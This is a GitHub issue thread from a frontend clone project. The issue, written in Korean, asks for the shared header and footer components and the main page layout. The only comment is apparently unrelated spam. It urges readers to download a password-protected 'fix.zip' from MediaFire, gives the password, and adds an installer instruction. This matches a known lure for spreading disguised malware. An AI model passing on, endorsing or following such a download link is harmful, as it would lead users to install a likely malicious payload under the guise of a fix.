### ISSUE TITLE
공통 레이아웃 컴포넌트 퍼블리싱

### ISSUE THREAD

**Issue by subin990218** [7-CtrlZ/SIVILLAGE-CLONE-FE#2]
메인 페이지에서 보일 header와 footer 퍼블리싱 및 메인 페이지 layout 설계

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
